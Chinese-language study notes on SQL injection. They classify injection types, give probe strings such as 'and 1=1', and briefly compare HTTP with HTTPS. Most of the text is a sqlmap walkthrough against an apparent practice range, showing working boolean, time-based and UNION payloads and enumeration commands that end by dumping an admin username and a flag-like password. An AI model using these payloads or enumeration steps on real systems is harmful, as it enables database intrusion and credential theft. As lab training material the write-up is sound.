1.数字型注入点
形如“http://****?ID=55”,这类注入的参数是“数字”,因此称为“数字型注入点”。
此类注入点提交的SQL语句,其原形大致为:Select * from 表名 where 字段=55
当我们提交注入参数为“http://****?ID=55 And[查询条件]”时,向数据库提交的完整 SQL 语句为:
Select * from 表名 where 字段=55 And [查询条件]
2.字符型注入点
形如“http://****?Class=日期”这类注入的参数是“字符”,因此称为“字符型”注入点。
此类注入点提交的 SQL 语句,其原形大致为:
select * from 表名 where 字段=’日期’
当我们提交注入参数为“http://****Class=日期 And[查询条件]时,向数据库提交的完整 SQL 语句为”:
select * from 表名 where 字段=’日期’ and [查询条件]
3.搜索型注入点
这是一类特殊的注入类型。这类注入主要是指在进行数据搜索时没过滤搜索参数,一般在链接地址中
有“keyword=关键字”,有的不显示的链接地址,而是直接通过搜索框表单提交。
此类注入点提交的 SQL 语句,其原形大致为:select * from 表名 where 字段 like ‘%关键字%’。
当我们提交注入参数为“keyword=’and[查询条件] and ‘%’=’,则向数据库提交的完事SQL语句为:
select * from 表名 where 字段 like ‘%’ and [查询条件] and ‘%’=’%’
注入点的判断
判断一个链接是否存在注入漏洞,可以通过对其传入的参数(但不仅仅只限于参数,还有cookie注入,HTTP头注入等) 进行构造,然后对服务器返回的内容进行判断来查看是否存在注入点。
注入点的种类
1.按注入点参数的类型分类
(1)数字型注入
例如id=1这种类型,向数据库传入的是数字,参数不需要被引号括起来。
(2)字符型注入
例如name=admin这种类型,像数据库传入的是字符串,参数需要被引号括起来。
2.按照数据请求方式来分类
(1)GET注入
HTTP请求方式为get,注入点一般在get传入的参数部分,例如?id=1,id便是一个注入点。
(2)POST注入
HTTP请求方式为post,注入点一般为提交的HTML表单, 即post传入的数据内容。
(3)HTTP头注入
HTTP的请求头存在注入点,例如XFF头,cookie,Host这些都是常见的注入点。
3.按照语句的执行效果来分类
(1)报错注入
页面会返回错误信息,或者将语句的查询结果直接返回到页面(这是最常见的一种注入,一般手注就可搞定)
(2)基于布尔的盲注
盲注的意思就是你无法直接通过页面的返回内容来获取信息,页面只会返回真假,你需要对一个个字符进行测试,相对于报错注入,盲注的工作量比较庞大,一般写脚本或者用工具跑。
(3)基于时间的盲注
页面无法直接返回真假,需要构造条件语句查看时间延迟的语句是否成功执行(观察页面的返回时间的长短)来进行判断。
(4)联合查询注入
通过union来将多条语句的结果组合到一个结果中
(5)宽字节注入
宽字节注入是由编码不统一引起的,一般是在PHP+MySQL中出现
(6)堆查询注入
堆叠查询可以构造执行多条语句
(7)二次注入
将攻击者构造的恶意数据存储在数据库后,恶意数据被读取并进入到SQL查询语句所导致的注入。
注入类型的判断
(1)数字型注入
判断步骤
1.首先在参数后加个单引号,URL:www.3333.com/text.php?id=1’ 对应的sql:select * from table where id=3’ 这时sql语句出错,程序无法正常从数据库中查询出数据,就会抛出异常;
2.在参数后加 and 1=1 www.33333.com/text.php?id=1 and 1=1 对应的sql:select * from table where id=3’ and 1=1 该语句前后都为真,语句执行正常,与原始页面无任何差异;
3.在参数后加 and 1=2 www.33333.com/text.php?id=1 and 1=2 对应的sql:select * from table where id=3’ and 1=2 该语句为假,所以无法返回结果,返回异常。
一般满足以上三点就可以认定该注入点的类型为数字型注入。
(2)字符型注入
判断步骤
1.加单引号:select * from table where name=’admin’’ 由于加单引号后变成三个单引号,则无法执行,程序会报错;
2.加 and 1=1 此时sql 语句为:select * from table where name=’admin’ and 1=1’ ,也无法进行注入,还需要通过注释符号将其绕过;(MySQL常用的注释符号有# – (后面还有个空格) /* */)
构造语句为:select * from table where name =’admin’ and 1=1#’ 可成功执行返回结果正确;
3.加and 1=2 此时sql语句为:select * from table where name=’admin’ and 1=2 –’则会报错。
如果满足以上三点的话,基本可以认定为字符型注入。
1.http 的URL 以http:// 开头,https以https:// 开头。
2.http 标准端口是80 ,https是443。
3.https 协议需要到ca申请证书,http不需要。
4.http 是超文本传输协议,信息是明文传输,https 则是具有安全性的ssl加密传输协议。
5.http 的连接很简单,是无状态的,https协议是由SSL+http协议构建的可进行加密传输、身份认证的网络协议 要比http协议安全。
优点:
通过证书可以更信任服务器。
更安全,防篡改。
缺点:
https 需要证书。
因为对传输进行加密,会一定程度增加cpu消耗。
由于https 要还密钥和确认加密算法的需要,所以首次建立连接会慢一些。
带宽消耗会增加。
HTTP超文本传输协议
超文本传输协议(HTTP,HyperText Transfer Protocol)是互联网上应用最为广泛的一种网络传输协议,所有的WWW文件都必须遵守这个标准。设计HTTP最初的目的是为了提供一种发布和接收HTML页面的方法。
1960年美国人Ted Nelson构思了一种通过计算机处理文本信息的方法,并称之为超文本(hypertext),这成为了HTTP超文本传输协议标准架构的发展根基。Ted Nelson组织协调万维网协会(World Wide Web Consortium)和互联网工程工作小组(Internet Engineering Task Force )共同合作研究,最终发布了一系列的 RFC,其中著名的RFC 2616定义了HTTP 1.1。
HTTPS
HTTPS(全称:Hyper Text Transfer Protocol over Secure Socket Layer),是以安全为目标的 HTTP通道,简单讲是HTTP的安全版,是网景于1994年创建的。即HTTP下加入SSL层,HTTPS的安全基础是SSL,因此加密的详细内容就需要SSL。 它是一个URI scheme(抽象标识符体系),句法类同 http:体系。用于安全的HTTP数据传输。可以解决信任主机、通讯过程中的数据的泄密和被篡改等问题。
这个系统的最初研发由网景公司(Netscape)进行,并内置于其浏览器Netscape Navigator中,提供了身份验证与加密通讯方法。现在它被广泛用于万维网上安全敏感的通讯,例如交易支付方面。
找到注入点并检测
http://shop.aqlab.cn:8001/single.php?id=1
id为注入点
这里是基于时间的注入
延迟高5s
Microsoft Windows [版本 10.0.18362.657]
(c) 2019 Microsoft Corporation。保留所有权利。
C:\Users\88304>cd Desktop
C:\Users\88304\Desktop>cd Sql-map
C:\Users\88304\Desktop\Sql-map>python sqlmap.py -h
___
__H__
___ ___[)]_____ ___ ___ {1.3.9.13#dev}
|_ -| . [)] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
Usage: sqlmap.py [options]
Options:
-h, --help Show basic help message and exit
-hh Show advanced help message and exit
--version Show program's version number and exit
-v VERBOSE Verbosity level: 0-6 (default 1)
Target:
At least one of these options has to be provided to define the
target(s)
-u URL, --url=URL Target URL (e.g. "http://www.site.com/vuln.php?id=1")
-g GOOGLEDORK Process Google dork results as target URLs
Request:
These options can be used to specify how to connect to the target URL
--data=DATA Data string to be sent through POST (e.g. "id=1")
--cookie=COOKIE HTTP Cookie header value (e.g. "PHPSESSID=a8d127e..")
--random-agent Use randomly selected HTTP User-Agent header value
--proxy=PROXY Use a proxy to connect to the target URL
--tor Use Tor anonymity network
--check-tor Check to see if Tor is used properly
Injection:
These options can be used to specify which parameters to test for,
provide custom injection payloads and optional tampering scripts
-p TESTPARAMETER Testable parameter(s)
--dbms=DBMS Force back-end DBMS to provided value
Detection:
These options can be used to customize the detection phase
--level=LEVEL Level of tests to perform (1-5, default 1)
--risk=RISK Risk of tests to perform (1-3, default 1)
Techniques:
These options can be used to tweak testing of specific SQL injection
techniques
--technique=TECH.. SQL injection techniques to use (default "BEUSTQ")
Enumeration:
These options can be used to enumerate the back-end database
management system information, structure and data contained in the
tables. Moreover you can run your own SQL statements
-a, --all Retrieve everything
-b, --banner Retrieve DBMS banner
--current-user Retrieve DBMS current user
--current-db Retrieve DBMS current database
--passwords Enumerate DBMS users password hashes
--tables Enumerate DBMS database tables
--columns Enumerate DBMS database table columns
--schema Enumerate DBMS schema
--dump Dump DBMS database table entries
--dump-all Dump all DBMS databases tables entries
-D DB DBMS database to enumerate
-T TBL DBMS database table(s) to enumerate
-C COL DBMS database table column(s) to enumerate
Operating system access:
These options can be used to access the back-end database management
system underlying operating system
--os-shell Prompt for an interactive operating system shell
--os-pwn Prompt for an OOB shell, Meterpreter or VNC
General:
These options can be used to set some general working parameters
--batch Never ask for user input, use the default behavior
--flush-session Flush session files for current target
Miscellaneous:
These options do not fit into any other category
--sqlmap-shell Prompt for an interactive sqlmap shell
--wizard Simple wizard interface for beginner users
[!] to see full list of options run with '-hh'
Press Enter to continue...
[17:04:05] [WARNING] you haven't updated sqlmap for more than 181 days!!!
C:\Users\88304\Desktop\Sql-map>sqlmap.py -u "http://shop.aqlab.cn:8001/single.php?id=1"
___
__H__
___ ___[,]_____ ___ ___ {1.3.9.13#dev}
|_ -| . [(] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 17:07:05 /2020-03-13/
[17:07:05] [INFO] testing connection to the target URL
[17:07:07] [INFO] checking if the target is protected by some kind of WAF/IPS
[17:07:07] [INFO] testing if the target URL content is stable
[17:07:07] [INFO] target URL content is stable
[17:07:07] [INFO] testing if GET parameter 'id' is dynamic
[17:07:07] [INFO] GET parameter 'id' appears to be dynamic
[17:07:08] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable
[17:07:08] [INFO] testing for SQL injection on GET parameter 'id'
[17:07:08] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[17:07:09] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="On")
[17:07:12] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'MySQL'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
[17:07:17] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[17:07:17] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[17:07:17] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[17:07:17] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[17:07:17] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[17:07:17] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[17:07:18] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[17:07:18] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[17:07:18] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[17:07:18] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[17:07:18] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[17:07:18] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[17:07:18] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[17:07:18] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[17:07:19] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[17:07:19] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[17:07:19] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[17:07:19] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[17:07:19] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[17:07:19] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[17:07:19] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[17:07:19] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[17:07:19] [INFO] testing 'MySQL inline queries'
[17:07:19] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[17:07:19] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[17:07:19] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP - comment)'
[17:07:19] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP)'
[17:07:20] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[17:07:20] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[17:07:20] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[17:07:30] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[17:07:30] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[17:07:30] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[17:07:30] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[17:07:31] [INFO] target URL appears to have 3 columns in query
[17:07:32] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 64 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 6148=6148 AND 'Wreb'='Wreb
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 1623 FROM (SELECT(SLEEP(5)))Gzvh) AND 'VrVT'='VrVT
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-1178' UNION ALL SELECT NULL,NULL,CONCAT(0x71706b6271,0x42735a685a6d44684763594c77654f4c576b626e447a7855636b4e7a6a556b6a427671424d666564,0x7176706b71)-- Hkuh
---
[17:07:35] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[17:07:35] [INFO] fetched data logged to text files under 'C:\Users\88304\AppData\Local\sqlmap\output\shop.aqlab.cn'
[17:07:35] [WARNING] you haven't updated sqlmap for more than 181 days!!!
[*] ending @ 17:07:35 /2020-03-13/
盲注简介
盲注就是在sql注入过程中,sql语句执行的选择后,选择的数据不能回显到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注。
盲注原理
盲注的本质就是猜解,在没有回显数据的情况下,我们只能靠‘感觉’来体会每次查询时一点点细微的差异,而这差异包括运行时间的差异和页面返回结果的差异。
对于基于布尔的盲注来说,我们可以构造一条注入语句来测试我们输入的布尔表达式,而这布尔表达式结果的真假,决定了每次页面有不同的反应。
对于基于时间的盲注来说,我们构造的语句中,包含了能否影响系统运行时间的函数,根据每次页面返回的时间,判断注入的语句是否被成功执行。
盲注分类
•基于布尔SQL盲注
•基于时间的SQL盲注
•基于报错的SQL盲注
盲注的流程:
找寻并确认sql盲注点
强制产生通用错误界面
注入带有副作用的查询
根据布尔表达式的真假结果,结合不同的返回结果确认注入是否成功
通过-u这段语句 检测成功了注入点
找数据库名
C:\Users\88304\Desktop\Sql-map>sqlmap -u "http://shop.aqlab.cn:8001/single.php?id=1" --dbs
___
__H__
___ ___[)]_____ ___ ___ {1.3.9.13#dev}
|_ -| . [,] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 17:17:48 /2020-03-13/
[17:17:48] [INFO] resuming back-end DBMS 'mysql'
[17:17:48] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 6148=6148 AND 'Wreb'='Wreb
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 1623 FROM (SELECT(SLEEP(5)))Gzvh) AND 'VrVT'='VrVT
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-1178' UNION ALL SELECT NULL,NULL,CONCAT(0x71706b6271,0x42735a685a6d44684763594c77654f4c576b626e447a7855636b4e7a6a556b6a427671424d666564,0x7176706b71)-- Hkuh
---
[17:17:48] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[17:17:48] [INFO] fetching database names
[17:17:49] [INFO] used SQL query returns 3 entries
[17:17:49] [INFO] retrieved: 'information_schema'
[17:17:49] [INFO] retrieved: 'cake'
[17:17:49] [INFO] retrieved: 'mysql'
available databases [3]:
[*] cake
[*] information_schema
[*] mysql
[17:17:50] [INFO] fetched data logged to text files under 'C:\Users\88304\AppData\Local\sqlmap\output\shop.aqlab.cn'
[17:17:50] [WARNING] you haven't updated sqlmap for more than 181 days!!!
[*] ending @ 17:17:50 /2020-03-13/
C:\Users\88304\Desktop\Sql-map>sqlmap.py --help
___
__H__
___ ___[']_____ ___ ___ {1.3.9.13#dev}
|_ -| . ['] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
Usage: sqlmap.py [options]
Options:
-h, --help Show basic help message and exit
-hh Show advanced help message and exit
--version Show program's version number and exit
-v VERBOSE Verbosity level: 0-6 (default 1)
Target:
At least one of these options has to be provided to define the
target(s)
-u URL, --url=URL Target URL (e.g. "http://www.site.com/vuln.php?id=1")
-g GOOGLEDORK Process Google dork results as target URLs
Request:
These options can be used to specify how to connect to the target URL
--data=DATA Data string to be sent through POST (e.g. "id=1")
--cookie=COOKIE HTTP Cookie header value (e.g. "PHPSESSID=a8d127e..")
--random-agent Use randomly selected HTTP User-Agent header value
--proxy=PROXY Use a proxy to connect to the target URL
--tor Use Tor anonymity network
--check-tor Check to see if Tor is used properly
Injection:
These options can be used to specify which parameters to test for,
provide custom injection payloads and optional tampering scripts
-p TESTPARAMETER Testable parameter(s)
--dbms=DBMS Force back-end DBMS to provided value
Detection:
These options can be used to customize the detection phase
--level=LEVEL Level of tests to perform (1-5, default 1)
--risk=RISK Risk of tests to perform (1-3, default 1)
Techniques:
These options can be used to tweak testing of specific SQL injection
techniques
--technique=TECH.. SQL injection techniques to use (default "BEUSTQ")
Enumeration:
These options can be used to enumerate the back-end database
management system information, structure and data contained in the
tables. Moreover you can run your own SQL statements
-a, --all Retrieve everything
-b, --banner Retrieve DBMS banner
--current-user Retrieve DBMS current user
--current-db Retrieve DBMS current database
--passwords Enumerate DBMS users password hashes
--tables Enumerate DBMS database tables
--columns Enumerate DBMS database table columns
--schema Enumerate DBMS schema
--dump Dump DBMS database table entries
--dump-all Dump all DBMS databases tables entries
-D DB DBMS database to enumerate
-T TBL DBMS database table(s) to enumerate
-C COL DBMS database table column(s) to enumerate
Operating system access:
These options can be used to access the back-end database management
system underlying operating system
--os-shell Prompt for an interactive operating system shell
--os-pwn Prompt for an OOB shell, Meterpreter or VNC
General:
These options can be used to set some general working parameters
--batch Never ask for user input, use the default behavior
--flush-session Flush session files for current target
Miscellaneous:
These options do not fit into any other category
--sqlmap-shell Prompt for an interactive sqlmap shell
--wizard Simple wizard interface for beginner users
Press Enter to continue...
[17:18:35] [WARNING] you haven't updated sqlmap for more than 181 days!!!
找到当前所在数据库 之后查表
C:\Users\88304\Desktop\Sql-map>sqlmap -u "http://shop.aqlab.cn:8001/single.php?id=1" --current-db
___
__H__
___ ___[)]_____ ___ ___ {1.3.9.13#dev}
|_ -| . [,] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 17:21:17 /2020-03-13/
[17:21:17] [INFO] resuming back-end DBMS 'mysql'
[17:21:17] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 6148=6148 AND 'Wreb'='Wreb
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 1623 FROM (SELECT(SLEEP(5)))Gzvh) AND 'VrVT'='VrVT
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-1178' UNION ALL SELECT NULL,NULL,CONCAT(0x71706b6271,0x42735a685a6d44684763594c77654f4c576b626e447a7855636b4e7a6a556b6a427671424d666564,0x7176706b71)-- Hkuh
---
[17:21:17] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[17:21:17] [INFO] fetching current database
current database: 'cake'
[17:21:17] [INFO] fetched data logged to text files under 'C:\Users\88304\AppData\Local\sqlmap\output\shop.aqlab.cn'
[17:21:17] [WARNING] you haven't updated sqlmap for more than 181 days!!!
[*] ending @ 17:21:17 /2020-03-13/
C:\Users\88304\Desktop\Sql-map>sqlmap -u "http://shop.aqlab.cn:8001/single.php?id=1" -D cake --tables
___
__H__
___ ___[)]_____ ___ ___ {1.3.9.13#dev}
|_ -| . ['] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 17:22:38 /2020-03-13/
[17:22:38] [INFO] resuming back-end DBMS 'mysql'
[17:22:38] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 6148=6148 AND 'Wreb'='Wreb
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 1623 FROM (SELECT(SLEEP(5)))Gzvh) AND 'VrVT'='VrVT
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-1178' UNION ALL SELECT NULL,NULL,CONCAT(0x71706b6271,0x42735a685a6d44684763594c77654f4c576b626e447a7855636b4e7a6a556b6a427671424d666564,0x7176706b71)-- Hkuh
---
[17:22:38] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[17:22:38] [INFO] fetching tables for database: 'cake'
[17:22:39] [INFO] used SQL query returns 2 entries
[17:22:39] [INFO] retrieved: 'cakes'
[17:22:39] [INFO] retrieved: 'user'
Database: cake
[2 tables]
+-------+
| user |
| cakes |
+-------+
[17:22:39] [INFO] fetched data logged to text files under 'C:\Users\88304\AppData\Local\sqlmap\output\shop.aqlab.cn'
[17:22:39] [WARNING] you haven't updated sqlmap for more than 181 days!!!
[*] ending @ 17:22:39 /2020-03-13/
可以检查一下cakes表里面的是html代码
uesr这个表有可能有管理员密码
C:\Users\88304\Desktop\Sql-map>sqlmap -u "http://shop.aqlab.cn:8001/single.php?id=1" -D cake -T user --columns
___
__H__
___ ___[(]_____ ___ ___ {1.3.9.13#dev}
|_ -| . ["] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 17:25:22 /2020-03-13/
[17:25:22] [INFO] resuming back-end DBMS 'mysql'
[17:25:22] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 6148=6148 AND 'Wreb'='Wreb
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 1623 FROM (SELECT(SLEEP(5)))Gzvh) AND 'VrVT'='VrVT
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-1178' UNION ALL SELECT NULL,NULL,CONCAT(0x71706b6271,0x42735a685a6d44684763594c77654f4c576b626e447a7855636b4e7a6a556b6a427671424d666564,0x7176706b71)-- Hkuh
---
[17:25:22] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[17:25:22] [INFO] fetching columns for table 'user' in database 'cake'
[17:25:22] [INFO] used SQL query returns 3 entries
[17:25:22] [INFO] retrieved: 'Id','int(11)'
[17:25:23] [INFO] retrieved: 'username','varchar(255)'
[17:25:23] [INFO] retrieved: 'passwd','varchar(255)'
Database: cake
Table: user
[3 columns]
+----------+--------------+
| Column | Type |
+----------+--------------+
| Id | int(11) |
| passwd | varchar(255) |
| username | varchar(255) |
+----------+--------------+
[17:25:23] [INFO] fetched data logged to text files under 'C:\Users\88304\AppData\Local\sqlmap\output\shop.aqlab.cn'
[17:25:23] [WARNING] you haven't updated sqlmap for more than 181 days!!!
[*] ending @ 17:25:23 /2020-03-13/
最后!!!!查看即可
C:\Users\88304\Desktop\Sql-map>sqlmap -u "http://shop.aqlab.cn:8001/single.php?id=1" -D cake -T user -C "username,passwd" --dump
___
__H__
___ ___[,]_____ ___ ___ {1.3.9.13#dev}
|_ -| . ["] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 17:31:46 /2020-03-13/
[17:31:47] [INFO] resuming back-end DBMS 'mysql'
[17:31:47] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 6148=6148 AND 'Wreb'='Wreb
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 1623 FROM (SELECT(SLEEP(5)))Gzvh) AND 'VrVT'='VrVT
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-1178' UNION ALL SELECT NULL,NULL,CONCAT(0x71706b6271,0x42735a685a6d44684763594c77654f4c576b626e447a7855636b4e7a6a556b6a427671424d666564,0x7176706b71)-- Hkuh
---
[17:31:47] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[17:31:47] [INFO] fetching entries of column(s) 'passwd, username' for table 'user' in database 'cake'
[17:31:47] [INFO] used SQL query returns 1 entry
Database: cake
Table: user
[1 entry]
+----------+----------------------+
| username | passwd |
+----------+----------------------+
| admin | flag-8adc-6513-e54az |
+----------+----------------------+
[17:31:47] [INFO] table 'cake.`user`' dumped to CSV file 'C:\Users\88304\AppData\Local\sqlmap\output\shop.aqlab.cn\dump\cake\user.csv'
[17:31:47] [INFO] fetched data logged to text files under 'C:\Users\88304\AppData\Local\sqlmap\output\shop.aqlab.cn'
[17:31:47] [WARNING] you haven't updated sqlmap for more than 181 days!!!
[*] ending @ 17:31:47 /2020-03-13/
-D 指的是数据库
-T 指的是表
-C 指的是字段(属性名)
–dump 枚举的意思